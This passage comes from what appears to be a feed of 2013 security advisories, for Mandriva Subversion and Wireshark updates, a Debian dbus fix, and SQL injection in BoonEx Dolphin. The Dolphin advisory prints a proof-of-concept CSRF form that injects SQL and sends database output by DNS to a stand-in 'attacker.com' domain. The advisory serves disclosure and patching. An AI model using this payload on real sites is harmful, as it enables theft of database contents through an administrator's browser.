 6cf641e169e452b6d650f3c40858fe5c  mbs1/x86_64/lib64svn-gnome-keyring0-1.7.10-0.1.mbs1.x86_64.rpm
 772edd952aafd1965ebb4409c9d51cf6  mbs1/x86_64/lib64svnjavahl1-1.7.10-0.1.mbs1.x86_64.rpm
 fdad77e3c7d89a1935cb90dd08c74d72  mbs1/x86_64/perl-SVN-1.7.10-0.1.mbs1.x86_64.rpm
 5b4eafd8291c21f1b12f059566b846db  mbs1/x86_64/perl-svn-devel-1.7.10-0.1.mbs1.x86_64.rpm
 50f81c1a757ca4b1d2aeccce3eb2dca8  mbs1/x86_64/python-svn-1.7.10-0.1.mbs1.x86_64.rpm
 200676fbcb36e143ec01a3f6fccb3513  mbs1/x86_64/python-svn-devel-1.7.10-0.1.mbs1.x86_64.rpm
 15004b7db070ded3caff2695df6d666b  mbs1/x86_64/ruby-svn-1.7.10-0.1.mbs1.x86_64.rpm
 dbd1df365ccbdd54f257bd507d662dc9  mbs1/x86_64/ruby-svn-devel-1.7.10-0.1.mbs1.x86_64.rpm
 4218a85705e07010c6c5225c031264a0  mbs1/x86_64/subversion-1.7.10-0.1.mbs1.x86_64.rpm
 94bbd1b84ec6cd0919c347e04167a1be  mbs1/x86_64/subversion-devel-1.7.10-0.1.mbs1.x86_64.rpm
 1f398aca282bf1c5b38a31a6efdead37  mbs1/x86_64/subversion-doc-1.7.10-0.1.mbs1.x86_64.rpm
 53a64a1f5f948d9e4be6d39a1c0ec05f  mbs1/x86_64/subversion-gnome-keyring-devel-1.7.10-0.1.mbs1.x86_64.rpm
 b6cb7b09aa94fef2b6ff04a0dad3aa56  mbs1/x86_64/subversion-server-1.7.10-0.1.mbs1.x86_64.rpm
 27b5bb16fe21cd0585758c4b78751dc0  mbs1/x86_64/subversion-tools-1.7.10-0.1.mbs1.x86_64.rpm
 f6b44cd8103689e5456148d20671e630  mbs1/x86_64/svn-javahl-1.7.10-0.1.mbs1.x86_64.rpm 
 f243a17e3e149d4c961945bbeb4d880b  mbs1/SRPMS/subversion-1.7.10-0.1.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFRudxBmqjQ0CJFipgRAhIaAKCN6Uww0VzElJ1TquZYXirDMBz9jwCeOHuV
ytl2RR3dbAHeFdfgq0wq5S0=
=pR4b
-----END PGP SIGNATURE-----

[SECURITY] [DSA 2707-1] dbus security update

Yves-Alexis Perez — 2013-06-13T12:49:21

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2707-1                   security< at >debian.org
http://www.debian.org/security/                         Yves-Alexis Perez
June 13, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : dbus
Vulnerability  : denial of service
Problem type   : local 
Debian-specific: no
CVE ID         : CVE-2013-2168

Alexandru Cornea discovered a vulnerability in libdbus caused by an
implementation bug in _dbus_printf_string_upper_bound(). This
vulnerability can be exploited by a local user to crash system services
that use libdbus, causing denial of service. Depending on the dbus
services running, it could lead to complete system crash.

The oldstable distribution (squeeze) is not affected by this problem.

For the stable distribution (wheezy), this problem has been fixed in
version 1.6.8-1+deb7u1.

For the testing distribution (jessie), this problem has been fixed in
version 1.6.12-1.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.12-1.

We recommend that you upgrade your dbus packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.20 (GNU/Linux)

iQEcBAEBCgAGBQJRub9QAAoJEG3bU/KmdcClBZ0H/AyRsjX0rH4O1dARNlgtNC8r
VdJyuzlKUzEbVxD7o8PV2EDBVU58h+7cQQUvA8l3qNFEKctcfPmJzGlkfuYaZWQg
ZlTH6FUA6fYsTrE7fsUUTig/wct12UMNJm+WLkkqWfjTAgwRJpyvwEg10TzwMUYH
pyvT86nGLaRIdxILczrfA8W+jDY8Ned4pj/DsKOY9ky+IkS3p9Mq7L/kAqe91Ynd
1HhAU7+9MbUg3UrSjGF7PF4BijR7/cseUiRd0R6oEdrzxXT9kbb57UCso9LcJh76
y/UfFqyetdJqqdyFqBnASHwCE510WmXwwSqSXWTnBpiEwJy7LjaXiCcZx8Ej1wg=
=gnak
-----END PGP SIGNATURE-----

[ MDVSA-2013:172 ] wireshark

2013-06-12T12:03:01

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:172
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : wireshark
 Date    : June 12, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in wireshark:
 
 * The ASN.1 BER dissector could crash (CVE-2013-3557).
 * The CAPWAP dissector could crash (CVE-2013-4074).
 * The HTTP dissector could overrun the stack (CVE-2013-4081).
 * The DCP ETSI dissector could crash (CVE-2013-4083).
 
 This advisory provides the latest version of Wireshark (1.6.16)
 which is not vulnerable to these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3557
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4074
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4081
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4083
 http://www.wireshark.org/docs/relnotes/wireshark-1.6.15.html
 http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:
 ee7dc085336b1112178dabcf9efcbfd6  mes5/i586/dumpcap-1.6.16-0.1mdvmes5.2.i586.rpm
 b3f0ee150e0cc4733bc6181784e3db0b  mes5/i586/libwireshark1-1.6.16-0.1mdvmes5.2.i586.rpm
 ae18d8a751ddf6d0197a7259d4958dd7  mes5/i586/libwireshark-devel-1.6.16-0.1mdvmes5.2.i586.rpm
 ce85c65696abc4a9112200d73334a2a0  mes5/i586/rawshark-1.6.16-0.1mdvmes5.2.i586.rpm
 9492d3e3dfccc7cc28b40558f2efc964  mes5/i586/tshark-1.6.16-0.1mdvmes5.2.i586.rpm
 bfb3a5facb92c41b43ec428b71bf6292  mes5/i586/wireshark-1.6.16-0.1mdvmes5.2.i586.rpm
 daefcf5e5f2e955df6bb39ce38f6adc2  mes5/i586/wireshark-tools-1.6.16-0.1mdvmes5.2.i586.rpm 
 13f53e174e10e8f7bf6b4896ea785067  mes5/SRPMS/wireshark-1.6.16-0.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 0e30acd436f428bf94164f2c2437ec37  mes5/x86_64/dumpcap-1.6.16-0.1mdvmes5.2.x86_64.rpm
 24515452924f9b39dac572d541eb7135  mes5/x86_64/lib64wireshark1-1.6.16-0.1mdvmes5.2.x86_64.rpm
 b29c2e1acb4bbdbeac5db892353c58a3  mes5/x86_64/lib64wireshark-devel-1.6.16-0.1mdvmes5.2.x86_64.rpm
 b86457579d9a945a5e1859186ae40d04  mes5/x86_64/rawshark-1.6.16-0.1mdvmes5.2.x86_64.rpm
 2a5971317b64668b1a0492ef05288707  mes5/x86_64/tshark-1.6.16-0.1mdvmes5.2.x86_64.rpm
 d22feab79bec9cd2dcffd339482cf8c2  mes5/x86_64/wireshark-1.6.16-0.1mdvmes5.2.x86_64.rpm
 9b49117a0bcc4427bd5d725cd9c5152a  mes5/x86_64/wireshark-tools-1.6.16-0.1mdvmes5.2.x86_64.rpm 
 13f53e174e10e8f7bf6b4896ea785067  mes5/SRPMS/wireshark-1.6.16-0.1mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 2390468bd95bc55cf6380912c651df30  mbs1/x86_64/dumpcap-1.6.16-1.mbs1.x86_64.rpm
 1640e819389b89792aeb281daaad14b4  mbs1/x86_64/lib64wireshark1-1.6.16-1.mbs1.x86_64.rpm
 1c29c375c42970380dce6e30c6a59193  mbs1/x86_64/lib64wireshark-devel-1.6.16-1.mbs1.x86_64.rpm
 edde8d7961d033ac5d76678604d19548  mbs1/x86_64/rawshark-1.6.16-1.mbs1.x86_64.rpm
 4cbfe7fe1c7b27bb69fb6863d5db7f6b  mbs1/x86_64/tshark-1.6.16-1.mbs1.x86_64.rpm
 637924c40d0bff5b4149d2baa6a68f0d  mbs1/x86_64/wireshark-1.6.16-1.mbs1.x86_64.rpm
 5e7375e0d750820e503635794e6f2636  mbs1/x86_64/wireshark-tools-1.6.16-1.mbs1.x86_64.rpm 
 80a49547bf467b19038b4688a0aed2b3  mbs1/SRPMS/wireshark-1.6.16-1.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFRuDfAmqjQ0CJFipgRAlYAAJwIpuOTE4GKqXJ9niV1xIIynwW/jwCdEhY/
JrhSt0wlpzW0Q1pgi4L6v7g=
=wYly
-----END PGP SIGNATURE-----

SQL Injection in Dolphin

2013-06-12T09:40:21

Advisory ID: HTB23157
Product: Dolphin
Vendor: BoonEx
Vulnerable Version(s): 7.1.2 and probably prior
Tested Version: 7.1.2
Vendor Notification: May 22, 2013 
Vendor Patch: May 29, 2013 
Public Disclosure: June 12, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-3638
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in Dolphin, which can be exploited to manipulate SQL requests passed to vulnerable application and obtain sensitive data from the database.


1) SQL Injection in Dolphin: CVE-2013-3638

The vulnerability exists due to insufficient validation of "pathes[]" HTTP POST parameter passed to "/administration/categories.php" PHP script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in application administrator to visit a web page with CSRF exploit.

The basic CSRF exploit code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The exploit will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):


<form action="http://[host]/administration/categories.php" method="post" name="main">
<input type="hidden" name="pathes[]"   value="1%%(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- %%1">
<input type="hidden" name="action_disable"   value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Dolphin 7.1.3

More Information:
http://www.boonex.com/trac/dolphin/changeset/17659
http://www.boonex.com/trac/dolphin/milestone/Dolphin%207.1.3
http://www.boonex.com/n/stability-security-spam-prevention-and-more


-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23157 - https://www.htbridge.com/advisory/HTB23157 - SQL Injection in Dolphin.
[2] Dolphin - http://www.boonex.com - The world's most advanced software platform for building vibrant community websites.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.